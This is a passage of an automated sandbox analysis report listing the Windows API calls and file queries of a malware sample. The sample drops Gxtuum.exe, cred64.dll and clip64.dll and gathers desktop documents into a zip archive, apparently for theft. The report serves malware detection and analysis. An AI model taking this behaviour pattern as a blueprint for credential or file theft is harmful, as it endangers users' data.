                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetLocaleInfoW,20_2_007E2711
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: EnumSystemLocalesW,20_2_007E27B8
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: EnumSystemLocalesW,20_2_007E2803
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: EnumSystemLocalesW,20_2_007D88AC
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: EnumSystemLocalesW,20_2_007E289E
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,20_2_007E2929
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetLocaleInfoW,20_2_007E2B7C
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,20_2_007E2CA2
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetLocaleInfoW,20_2_007D8DCE
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetLocaleInfoW,20_2_007E2DA8
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,20_2_007E2E77
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\audiodg.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\ucrtbase.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402 VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402 VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402 VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402 VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\_ctypes.pyd VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402 VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-console-l1-1-0.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-datetime-l1-1-0.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\api-ms-win-core-debug-l1-1-0.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402\base_library.zip VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI71402 VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\Desktop\AQRFEVRTGL VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\Desktop\EFOYFBOLXA VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\Desktop\GRXZDKKVDB VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\Documents\EFOYFBOLXA VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\Pictures VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeQueries volume information: C:\Users\user\Videos VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeQueries volume information: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10000820101\update.exe VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10000820101\update.exe VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10000830101\update.exe VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10000830101\update.exe VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\EFOYFBOLXA.docx VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\EOWRVPQCCS.xlsx VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\GRXZDKKVDB.docx VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\GRXZDKKVDB.xlsx VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\PALRGUCVEH.xlsx VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\EFOYFBOLXA.docx VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\EOWRVPQCCS.xlsx VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\GRXZDKKVDB.docx VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\GRXZDKKVDB.xlsx VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\PALRGUCVEH.xlsx VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
                              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
                              Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
